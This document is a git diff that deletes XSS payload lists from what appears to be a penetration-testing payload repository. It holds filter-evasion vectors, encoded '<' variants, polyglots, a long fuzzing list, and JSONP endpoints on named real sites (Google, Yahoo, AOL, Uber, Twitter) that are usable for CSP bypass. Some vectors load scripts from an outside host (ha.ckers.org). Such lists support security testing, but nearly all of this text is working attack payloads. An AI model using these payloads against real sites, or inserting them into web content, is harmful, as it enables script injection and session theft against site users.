-<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> -<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> -<XSS STYLE="xss:expression(alert('XSS'))"> -exp/*<A STYLE='no\xss:noxss("*//*"); -xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'> -<STYLE TYPE="text/javascript">alert('XSS');</STYLE> -<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> -<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> -<!--[if gte IE 4]> -<SCRIPT>alert('XSS');</SCRIPT> -<![endif]--> -<BASE HREF="javascript:alert('XSS');//"> -<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> -<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT> -<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED> -<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> -a="get"; -b="URL(\""; -c="javascript:"; -d="alert('XSS');\")"; -eval(a+b+c+d); -<HTML xmlns:xss> - <?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"> - <xss:xss>XSS</xss:xss> -</HTML> -<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]> -</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> -<XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:alert('XSS')"&gt;</B></I></XML> -<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> -<XML SRC="xsstest.xml" ID=I></XML> -<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> -<HTML><BODY> -<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"> -<?import namespace="t" implementation="#default#time2"> -<t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;"> -</BODY></HTML> -<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> -<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"--> -<? echo('<SCR)'; -echo('IPT>alert("XSS")</SCRIPT>'); ?> -<META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;"> -<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- -<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> -<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> -<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> -<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> -<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> -<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> -<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> -<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> -<A HREF="javascript:document.location='http://www.google.com/'">XSS</A> -<A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A> -< -%3C -&lt -&lt; -&LT -&LT; -&#60 -&#060 -&#0060 -&#00060 -&#000060 -&#0000060 -&#60; -&#060; -&#0060; -&#00060; -&#000060; -&#0000060; -&#x3c -&#x03c -&#x003c -&#x0003c -&#x00003c -&#x000003c -&#x3c; -&#x03c; -&#x003c; -&#x0003c; -&#x00003c; -&#x000003c; -&#X3c -&#X03c -&#X003c -&#X0003c -&#X00003c -&#X000003c -&#X3c; -&#X03c; -&#X003c; -&#X0003c; -&#X00003c; -&#X000003c; -&#x3C -&#x03C -&#x003C -&#x0003C -&#x00003C -&#x000003C -&#x3C; -&#x03C; -&#x003C; -&#x0003C; -&#x00003C; -&#x000003C; -&#X3C -&#X03C -&#X003C -&#X0003C -&#X00003C -&#X000003C -&#X3C; -&#X03C; -&#X003C; -&#X0003C; -&#X00003C; -&#X000003C; -\x3c -\x3C -\u003c -\u003C diff --git a/XSS Injection/Intruders/XSS_Polyglots.txt b/XSS Injection/Intruders/XSS_Polyglots.txt deleted file mode 100644 index 8d92c85..0000000 --- a/XSS Injection/Intruders/XSS_Polyglots.txt +++ /dev/null @@ -1,16 +0,0 @@ -jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e -';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> -“ onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)// -'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg"> -javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/* -javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a -javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/ -javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/* -javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/* -javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()// -javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/* ---></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/* -/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/* -javascript://--></title></style></textarea></script><svg "//' onclick=alert()// -/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/* -JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76--> diff --git a/XSS Injection/Intruders/jsonp_endpoint.txt b/XSS Injection/Intruders/jsonp_endpoint.txt deleted file mode 100644 index 12add24..0000000 --- a/XSS Injection/Intruders/jsonp_endpoint.txt +++ /dev/null @@ -1,57 +0,0 @@ -#Google.com: -"><script+src="https://googleads.g.doubleclick.net/pagead/conversion/1036918760/wcm?callback=alert(1337)"></script> -"><script+src="https://www.googleadservices.com/pagead/conversion/1070110417/wcm?callback=alert(1337)"></script> -"><script+src="https://cse.google.com/api/007627024705277327428/cse/r3vs7b0fcli/queries/js?callback=alert(1337)"></script> -"><script+src="https://accounts.google.com/o/oauth2/revoke?callback=alert(1337)"></script> -#Blogger.com: -"><script+src="https://www.blogger.com/feeds/5578653387562324002/posts/summary/4427562025302749269?callback=alert(1337)"></script> -#Yandex: -"><script+src="https://translate.yandex.net/api/v1.5/tr.json/detect?callback=alert(1337)"></script> -"><script+src="https://api-metrika.yandex.ru/management/v1/counter/1/operation/1?callback=alert"></script> -#VK.com: -"><script+src="https://api.vk.com/method/wall.get?callback=alert(1337)"></script> -#Marketo.com -"><script+src="http://app-sjint.marketo.com/index.php/form/getKnownLead?callback=alert()"></script> -"><script+src="http://app-e.marketo.com/index.php/form/getKnownLead?callback=alert()"></script> -#AlibabaGroup: -"><script+src="https://detector.alicdn.com/2.7.3/index.php?callback=alert(1337)"></script> -"><script+src="https://suggest.taobao.com/sug?callback=alert(1337)"></script> -"><script+src="https://count.tbcdn.cn//counter3?callback=alert(1337)"></script> -"><script+src="https://bebezoo.1688.com/fragment/index.htm?callback=alert(1337)"></script> -"><script+src="https://wb.amap.com/channel.php?callback=alert(1337)"></script> -"><script+src="http://a.sm.cn/api/getgamehotboarddata?format=jsonp&page=1&_=1537365429621&callback=confirm(1);jsonp1"></script> -"><script+src="http://api.m.sm.cn/rest?method=tools.sider&callback=jsonp_1869510867%3balert(1)%2f%2f794"></script> -#Uber.com: -"><script+src="https://mkto.uber.com/index.php/form/getKnownLead?callback=alert(document.domain);"></script> -#AOL/Yahoo -"><script+src="https://ads.yap.yahoo.com/nosdk/wj/v1/getAds.do?cb=alert(1337)"></script> -"><script+src="https://mempf.yahoo.co.jp/offer?position=h&callback=alert(1337)"></script> -"><script+src="https://suggest-shop.yahooapis.jp/Shopping/Suggest/V1/suggester?callback=alert(1)//&appid=dj0zaiZpPVkwMDJ1RHlqOEdwdCZzPWNvbnN1bWVyc2VjcmV0Jng9M2Y-"></script> -"><script+src="https://www.aol.com/amp-proxy/api/finance-instruments/14.1.MSTATS_NYSE_L/?callback=confirm(9)//jQuery1120033838593671435757_1537274810388&_=1537274810389"></script> -"><script+src="https://df-webservices.comet.aol.com/sigfig/ws?service=sigfig_portfolios&porttype=2&portmax=5&rf=http://www.dailyfinance.com&callback=jsonCallback24098%3balert(1)%2f%2f476&_=1537149044679"></script> -"><script+src="https://api.cmi.aol.com/content/alert/homepage-alert?site=usaol&callback=confirm(1);//jQuery20108887725116629929_1528071050373472232&_=1528071050374"></script> -"><script+src="https://api.cmi.aol.com/catalog/cms/help-central-usaol-navigation-utility?callback=confirm(1);//jQuery20108887725116629929_152807105037740504&_=1528071050378"></script> -"><script+src="https://www.aol.com/amp-proxy/api/finance-instruments/14.1.MSTATS_NYSE_L/?callback=confirm(9)//jQuery1120033838593671435757_1537274810388&_=1537274810389"></script> -"><script+src="https://ui.comet.aol.com/?module=header%7Cleftnav%7Cfooter&channel=finance&portfolios=true&domain=portfolios&collapsed=1&callback=confirm(9)//jQuery21307555521146732187_1538371213486&_=1538371213487"></script> -"><script+src="http://portal.pf.aol.com/jsonmfus/?service=myportfolios,&porttype=1&portmax=100&callback=confirm(9)//jQuery1710788849030856973_1538354104695&_=1538354109053"></script> -#Twitter.com: -"><script+src="http://search.twitter.com/trends.json?callback=alert()"></script> -"><script+src="https://twitter.com/statuses/user_timeline/yakumo119info.json?callback=confirm()"></script> -"><script+src="https://twitter.com/status/user_timeline/kbeautysalon.json?count=1&callback=confirm()"></script> -#Others: -"><script+src="https://www.sharethis.com/get-publisher-info.php?callback=alert(1337)"></script> -"><script+src="https://m.addthis.com/live/red_lojson/100eng.json?callback=alert(1337)"></script> -"><script+src="https://passport.ngs.ru/ajax/check?callback=alert(1337)"></script> -"><script+src="https://ulogin.ru/token.php?callback=alert(1337)"></script> -"><script+src="https://www.meteoprog.ua/data/weather/informer/Poltava.js?callback=alert(1337)"></script> -"><script+src="https://appcenter.intuit.com/Account/LogoutJSONP?callback=alert(1337)"></script> -"><script+src="https://api.userlike.com/api/chat/slot/proactive/?callback=alert(1337)"></script> -"><script+src="https://www.youku.com/index_cookielist/s/jsonp?callback=alert(1337)"></script> -"><script+src="https://api.mixpanel.com/track/?callback=alert(1337)"></script> -"><script+src="https://www.travelpayouts.com/widgets/50f53ce9ada1b54bcc000031.json?callback=alert(1337)"></script> -"><script+src="http://ads.pictela.net/a/proxy/shoplocal/alllistings/d5dadac1578db80a/citystatezip=10008;pd=40B5B0493316E5A3D4A389374BC5ED3ED8C7AB99817408B4EF64205A5B936BC45155806F9BF419E853D2FCD810781C;promotioncode=Petco-140928;sortby=23;listingimageflag=y;listingimagewidth=300;resultset=full;listingcount=100;;callback=alert(1);/json"></script> -"><script+src="https://adserver.adtechus.com/pubapi/3.0/9857.1/3792195/0/170/ADTECH;noperf=1;cmd=bid;bidfloor=0.12;callback=confirm(1);//window.proper_d31c1edc_57a8d6de_38"></script> -#GoogleAPI's -"><embed src='//ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?allowedDomain=\"})))}catch(e){alert(1337)}//' allowscriptaccess=always> -"><script src=//ajax.googleapis.com/ajax/services/feed/find?v=1.0%26callback=alert%26context=1337></script> -ng-app"ng-csp ng-click=$event.view.alert(1337)><script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js></script> diff --git a/XSS Injection/Intruders/xss_alert.txt b/XSS Injection/Intruders/xss_alert.txt deleted file mode 100644 index 4fdbaff..0000000 --- a/XSS Injection/Intruders/xss_alert.txt +++ /dev/null @@ -1,667 +0,0 @@ -<script\x20type="text/javascript">javascript:alert(1);</script> -<script\x3Etype="text/javascript">javascript:alert(1);</script> -<script\x0Dtype="text/javascript">javascript:alert(1);</script> -<script\x09type="text/javascript">javascript:alert(1);</script> -<script\x0Ctype="text/javascript">javascript:alert(1);</script> -<script\x2Ftype="text/javascript">javascript:alert(1);</script> -<script\x0Atype="text/javascript">javascript:alert(1);</script> -'`"><\x3Cscript>javascript:alert(1)</script> -'`"><\x00script>javascript:alert(1)</script> -<img src=1 href=1 onerror="javascript:alert(1)"></img> -<audio src=1 href=1 onerror="javascript:alert(1)"></audio> -<video src=1 href=1 onerror="javascript:alert(1)"></video> -<body src=1 href=1 onerror="javascript:alert(1)"></body> -<image src=1 href=1 onerror="javascript:alert(1)"></image> -<object src=1 href=1 onerror="javascript:alert(1)"></object> -<script src=1 href=1 onerror="javascript:alert(1)"></script> -<svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize> -<title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange> -<iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad> -<body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter> -<body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus> -<frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll> -<script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange> -<html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp> -<body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange> -<svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad> -<body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide> -<body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver> -<body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload> -<body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad> -<bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange> -<html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave> -<html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel> -<style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad> -<iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange> -<body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow> -<style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange> -<frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus> -<applet onError applet onError="javascript:javascript:alert(1)"></applet onError> -<marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart> -<script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad> -<html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver> -<html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter> -<body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload> -<html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown> -<marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee onScroll> -<xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange> -<frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur> -<applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange> -<svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload> -<html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut> -<body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove> -<body onResize body onResize="javascript:javascript:alert(1)"></body onResize> -<object onError object onError="javascript:javascript:alert(1)"></object onError> -<body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState> -<html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove> -<applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange> -<body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide> -<svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload> -<applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror> -<body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup> -<body onunload body onunload="javascript:javascript:alert(1)"></body onunload> -<iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload> -<body onload body onload="javascript:javascript:alert(1)"></body onload> -<html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover> -<object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload> -<body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload> -<body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus> -<body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown> -<iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload> -<iframe src iframe src="javascript:javascript:alert(1)"></iframe src> -<svg onload svg onload="javascript:javascript:alert(1)"></svg onload> -<html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove> -<body onblur body onblur="javascript:javascript:alert(1)"></body onblur> -\x3Cscript>javascript:alert(1)</script> -'"`><script>/* *\x2Fjavascript:alert(1)// */</script> -<script>javascript:alert(1)</script\x0D -<script>javascript:alert(1)</script\x0A -<script>javascript:alert(1)</script\x0B -<script charset="\x22>javascript:alert(1)</script> -<!--\x3E<img src=xxx:x onerror=javascript:alert(1)> --> ---><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> --> ---><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)> --> ---><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)> --> ---><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)> --> -`"'><img src='#\x27 onerror=javascript:alert(1)> -<a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a> -"'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p> -<a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a> -<script>/* *\x2A/javascript:alert(1)// */</script> -<script>/* *\x00/javascript:alert(1)// */</script> -<style></style\x3E<img src="about:blank" onerror=javascript:alert(1)//></style> -<style></style\x0D<img src="about:blank" onerror=javascript:alert(1)//></style> -<style></style\x09<img src="about:blank" onerror=javascript:alert(1)//></style> -<style></style\x20<img src="about:blank" onerror=javascript:alert(1)//></style> -<style></style\x0A<img src="about:blank" onerror=javascript:alert(1)//></style> -"'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';">DEF -"'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';">DEF -<script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script> -<script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script> -<script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script> -'`"><\x3Cscript>javascript:alert(1)</script> -'`"><\x00script>javascript:alert(1)</script> -"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)> -"'`><\x00img src=xxx:x onerror=javascript:alert(1)> -<script src="data:text/plain\x2Cjavascript:alert(1)"></script> -<script src="data:\xD4\x8F,javascript:alert(1)"></script> -<script src="data:\xE0\xA4\x98,javascript:alert(1)"></script> -<script src="data:\xCB\x8F,javascript:alert(1)"></script> -<script\x20type="text/javascript">javascript:alert(1);</script> -<script\x3Etype="text/javascript">javascript:alert(1);</script> -<script\x0Dtype="text/javascript">javascript:alert(1);</script> -<script\x09type="text/javascript">javascript:alert(1);</script> -<script\x0Ctype="text/javascript">javascript:alert(1);</script> -<script\x2Ftype="text/javascript">javascript:alert(1);</script> -<script\x0Atype="text/javascript">javascript:alert(1);</script> -ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF -ABC<div style="x:expression\x5C(javascript:alert(1)">DEF -ABC<div style="x:expression\x00(javascript:alert(1)">DEF -ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF -ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF -ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF -ABC<div style="x:\x09expression(javascript:alert(1)">DEF -ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF -ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF -ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF -ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF -ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF -ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF -ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF -ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF -ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF -ABC<div style="x:\x20expression(javascript:alert(1)">DEF -ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF -ABC<div style="x:\x00expression(javascript:alert(1)">DEF -ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF -ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF -ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF -ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF -ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF -ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF -ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF -ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF -<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a> -`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)> -`"'><img src=xxx:x \x22onerror=javascript:alert(1)> -`"'><img src=xxx:x \x0Bonerror=javascript:alert(1)> -`"'><img src=xxx:x \x0Donerror=javascript:alert(1)> -`"'><img src=xxx:x \x2Fonerror=javascript:alert(1)> -`"'><img src=xxx:x \x09onerror=javascript:alert(1)> -`"'><img src=xxx:x \x0Conerror=javascript:alert(1)> -`"'><img src=xxx:x \x00onerror=javascript:alert(1)> -`"'><img src=xxx:x \x27onerror=javascript:alert(1)> -`"'><img src=xxx:x \x20onerror=javascript:alert(1)> -"`'><script>\x3Bjavascript:alert(1)</script> -"`'><script>\x0Djavascript:alert(1)</script> -"`'><script>\xEF\xBB\xBFjavascript:alert(1)</script> -"`'><script>\xE2\x80\x81javascript:alert(1)</script> -"`'><script>\xE2\x80\x84javascript:alert(1)</script> -"`'><script>\xE3\x80\x80javascript:alert(1)</script> -"`'><script>\x09javascript:alert(1)</script> -"`'><script>\xE2\x80\x89javascript:alert(1)</script> -"`'><script>\xE2\x80\x85javascript:alert(1)</script> 